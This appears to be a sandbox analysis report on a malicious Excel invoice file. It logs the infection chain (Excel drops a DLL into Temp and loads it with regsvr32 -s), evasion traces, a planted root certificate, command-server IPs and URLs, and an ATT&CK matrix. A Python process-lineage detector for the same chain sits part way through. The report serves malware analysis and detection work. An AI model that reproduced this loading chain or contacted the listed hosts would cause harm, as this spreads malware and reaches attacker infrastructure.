Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Source: unknown | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840
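The process chain above is EXCEL.EXE -> C:\Windows\System32\regsvr32.exe -s <DLL in Temp>. -> C:\Windows\SysWOW64\regsvr32.exe (the 64-bit regsvr32 re-launches its 32-bit copy because the dropped module is 32-bit). Two things carry the detection: the parent is an Office process, and the module argument points into AppData\Local\Temp. The trailing dot on aymakjne.dll. also needs handling: Win32 path normalization strips trailing dots from the final path component, so the file that actually loads is aymakjne.dll, and a literal match on ".dll" at the end of the command line misses it. The checks below are an added example and are not the Sigma rules the report refers to; the events are constructed from the command lines above with made-up PIDs, in Sysmon Event ID 1 field style.

```python
"""Process-lineage checks for the chain shown above: Office -> regsvr32 -s <DLL in Temp>.
Added example, not the report's Sigma rules; EVENTS are constructed from the report's
command lines with placeholder PIDs, field names follow Sysmon Event ID 1."""
import ntpath
import re
from typing import Optional

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "certutil.exe", "msiexec.exe"}
# Locations a standard user can write to; a DLL registered from here is not an installer at work.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|AppData\\Roaming|Users\\Public|ProgramData|Downloads)\\", re.I)

EVENTS = [  # constructed from the report's command lines; PIDs are placeholders
    {"pid": 100, "ppid": 900,
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'"C:\Windows\System32\regsvr32.exe" -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"-s C:\Users\user\AppData\Local\Temp\aymakjne.dll."},
    {"pid": 400, "ppid": 900,  # benign control: registration of a system DLL from System32
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'"C:\Windows\System32\regsvr32.exe" /s C:\Windows\System32\msxml3.dll'},
]


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def normalize_win_path(path: str) -> str:
    """Win32 strips trailing dots and spaces from the last component, so 'aymakjne.dll.'
    on the command line opens 'aymakjne.dll'; match on that form, not the literal."""
    return path.strip('"').rstrip(". ")


def module_argument(cmdline: str) -> Optional[str]:
    """regsvr32 takes the module as the last argument that is not a -/ switch."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    for tok in reversed(tokens):
        if not tok.startswith(("-", "/")):
            return normalize_win_path(tok)
    return None


def office_spawning_lolbin(events):
    """Sigma-style 'Office product spawning Windows shell / LOLBin' check via the parent image."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in OFFICE and basename(e["image"]) in LOLBINS:
            hits.append((basename(parent["image"]), basename(e["image"]), e["cmdline"]))
    return hits


def regsvr32_user_writable_module(events):
    """regsvr32 registering a module from a user-writable path (here AppData\\Local\\Temp)."""
    hits = []
    for e in events:
        if basename(e["image"]) != "regsvr32.exe":
            continue
        mod = module_argument(e["cmdline"])
        if mod and USER_WRITABLE.search(mod):
            hits.append((e["pid"], mod))
    return hits


def lineage(events, pid):
    """Walk ppid links upward and return the chain of image basenames, root first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    print(office_spawning_lolbin(EVENTS))
    print(regsvr32_user_writable_module(EVENTS))
    print(lineage(EVENTS, 300))
```

The second rule fires twice, once for each regsvr32 in the chain, and the benign System32 registration stays quiet; in a real pipeline the parent lookup should use the process GUID rather than the PID, since PIDs are reused.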
Source: C:\Windows\System32\DWWIN.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: INV2680371456-20210111889374.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: INV2680371456-20210111889374.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: INV2680371456-20210111889374.xlsm | Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: d0l359[1].rar.0.dr | Static PE information: section name: .rdata3
Source: d0l359[1].rar.0.dr | Static PE information: section name: .2
Source: d0l359[1].rar.0.dr | Static PE information: section name: .rdata2
Source: d0l359[1].rar.0.dr | Static PE information: section name: .text4
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_100107FB pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0017BFB0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00147172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001662CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0015F6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0014899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001489CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0016FB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00141D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00140E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\aymakjne.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (36 occurrences)
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001588DD rdtsc
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2780 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -572000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -396000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -456000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -540000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -644000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -326000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -598000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -548000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -414000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -645000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -289000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -471000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -531000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -1460000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -532000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -344000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -465000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -293000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -700000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -678000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -918000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -489000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -417000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -426000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -696000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -348000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -594000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -580000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -268000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -494000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -358000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -566000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -588000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -889000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -918000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -650000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -253000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -492000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -1050000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -160000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -686000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -618000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -255000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -340000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -658000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -666000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -830000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -244000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -311000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -477000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -291000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -162000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -319000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -327000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -265000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -273000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -171000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -337000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -269000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -154000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -277000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep time: -310000s >= -30000s
Source: C:\Windows\System32\DWWIN.EXE TID: 2428 | Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001588DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0017B5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0017B6E0 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 77.220.64.37 187
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting22 | Path Interception | Process Injection112 | Masquerading11 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion1 | LSASS Memory | Security Software Discovery11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution43 | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting22 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol23 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Regsvr321 | DCSync | System Information Discovery13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact

Behavior Graph

(rendered as an interactive graph image in the original report; not reproduced here)

Screenshots

(screenshot thumbnails in the original report; not reproduced here)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
INV2680371456-20210111889374.xlsm | 47% | Virustotal |
INV2680371456-20210111889374.xlsm | 8% | Metadefender |
INV2680371456-20210111889374.xlsm | 32% | ReversingLabs | Script-Macro.Trojan.Remcos

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\aymakjne.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar | 38% | ReversingLabs | Win32.Trojan.Wacatac
C:\Users\user\AppData\Local\Temp\aymakjne.dll | 38% | ReversingLabs | Win32.Trojan.Wacatac

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
cdn.digicertcdn.com | 0% | Virustotal |
truxiellogroup.com | 2% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://80.86.91.27/ | 5% | Virustotal |
https://80.86.91.27/ | 0% | Avira URL Cloud | safe
https://77.220.64.37/ | 7% | Virustotal |
https://77.220.64.37/ | 0% | Avira URL Cloud | safe
https://80.86.91.27/P | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://5.100.228.233/qM | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://80.86.91.27:3308/IB | 0% | Avira URL Cloud | safe
https://46.105.131.65:1512/ | 0% | Avira URL Cloud | safe
https://46.105.131.65/f | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://80.86.91.27:3308/AB | 0% | Avira URL Cloud | safe
https://46.105.131.65:1512/yB | 0% | Avira URL Cloud | safe
https://5.100.228.233:3389/aB | 0% | Avira URL Cloud | safe
